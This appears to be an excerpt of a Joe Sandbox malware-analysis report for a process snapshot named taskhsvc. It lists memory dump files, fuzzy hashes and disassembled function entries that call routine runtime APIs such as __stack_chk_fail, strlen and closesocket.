Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: free$__stack_chk_fail
String ID:
API String ID: 3445780955-0
Opcode ID: 5bafe1e5ce4fb6bafcf142dadc6746ab188945c3769d28d0ea0a858b26b03f87
Instruction ID: 5030b33a5676f20804916ec6acb880dabcb18e2d454c466bfbec444c91793203
Opcode Fuzzy Hash: 5bafe1e5ce4fb6bafcf142dadc6746ab188945c3769d28d0ea0a858b26b03f87
Instruction Fuzzy Hash: E12174B490060ACFDB00DFA9C485BAEBBF4BB04304F058869D951E7351DB78EA45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF5C4C Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00EF5C82

Part of subcall function 00EF3938: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00DEFF97), ref: 00EF3967
Part of subcall function 00EF3938: __stack_chk_fail.LIBSSP-0 ref: 00EF39A8

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

strlen.MSVCRT ref: 00EF5CC4
__stack_chk_fail.LIBSSP-0 ref: 00EF5CF3

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$freestrchrstrlen
String ID:
API String ID: 2652206642-0
Opcode ID: dd76139b909ded844809cd79e2db70210f0f025dfeac5e076aa5352dfc9fb3a9
Instruction ID: ee5fd7698bc9da0d0119c95fc9cf9299ff0f770636295240498148fe2df9eb68
Opcode Fuzzy Hash: dd76139b909ded844809cd79e2db70210f0f025dfeac5e076aa5352dfc9fb3a9
Instruction Fuzzy Hash: 201192B4D047099FCB04EFA8C5856AEFBF0BF48304F10882DE998A7344D77899458F62

Uniqueness

Uniqueness Score: -1.00%

Function 00DBEBE4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00EE9B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EE45AC), ref: 00EE9B69

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00E2B75C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,00E2CF41), ref: 00E2B790

Part of subcall function 00E2B797: __stack_chk_fail.LIBSSP-0 ref: 00E2B7F8

Part of subcall function 00E2B7FF: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,00E2C2A8), ref: 00E2B86C

Part of subcall function 00D921C4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00E4FEAD), ref: 00D921F7

__stack_chk_fail.LIBSSP-0 ref: 00DBEE36

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00EE9D53: __stack_chk_fail.LIBSSP-0 ref: 00EE9DB3

Strings

Z, xrefs: 00DBEDA4

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID: Z
API String ID: 4216919130-3780660799
Opcode ID: 564802bb6c31466b9518dd7436099c169af4d5f897d5567564aba1e0142481e7
Instruction ID: bef90c16dacf8792c9c7e81ff6ea18fedafb92041177bbfcb244b8f584b6e2cb
Opcode Fuzzy Hash: 564802bb6c31466b9518dd7436099c169af4d5f897d5567564aba1e0142481e7
Instruction Fuzzy Hash: E1719EB4904759DFCB00EFA9C485AEEBBF0FF48300F158819E899AB351E7349944DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00DC0BA7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DC0D39

Part of subcall function 00DC3521: abort.MSVCRT ref: 00DC3577

Strings

], xrefs: 00DC0CA1

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID: ]
API String ID: 3276312271-813518171
Opcode ID: df38afdd7297b8f108f110adfc54fda338871246366f9fcf6328c8c4080f1f0f
Instruction ID: 97119f6938fab0d4b2c5691d0cc6badb977389e8b0467bb6fd5d5cd646891b82
Opcode Fuzzy Hash: df38afdd7297b8f108f110adfc54fda338871246366f9fcf6328c8c4080f1f0f
Instruction Fuzzy Hash: 2441B774A0460ACBCB10EFB9C585BADBBF0AF08354F158559E8A5EB251E734D980DB31

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6DE9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00EE6D57: closesocket.WS2_32 ref: 00EE6D7F
Part of subcall function 00EE6D57: __stack_chk_fail.LIBSSP-0 ref: 00EE6DE2

Part of subcall function 00EE6CDC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EE6E12), ref: 00EE6D20

__stack_chk_fail.LIBSSP-0 ref: 00EE6E9A

Strings

6', xrefs: 00EE6E27

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$closesocket
String ID: 6'
API String ID: 929215890-1842296545
Opcode ID: 8b30a265b05050314679bfaeed77062849ff75078043eaf72e1022749b260caa
Instruction ID: 8533ed81ef21b90317ba05078b740c0888f2d59f803ca591e5f2f2a5c62007ac
Opcode Fuzzy Hash: 8b30a265b05050314679bfaeed77062849ff75078043eaf72e1022749b260caa
Instruction Fuzzy Hash: 9B113AB090438A9FCB10EFA9C44966EBBF0BB01348F009A18F4A4EB259DB789505CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00DC0D83 Relevance: 3.5, APIs: 2, Instructions: 462COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DC1529

Part of subcall function 00EF5435: __stack_chk_fail.LIBSSP-0 ref: 00EF5455

Part of subcall function 00DBF26C: __stack_chk_fail.LIBSSP-0 ref: 00DBF37D

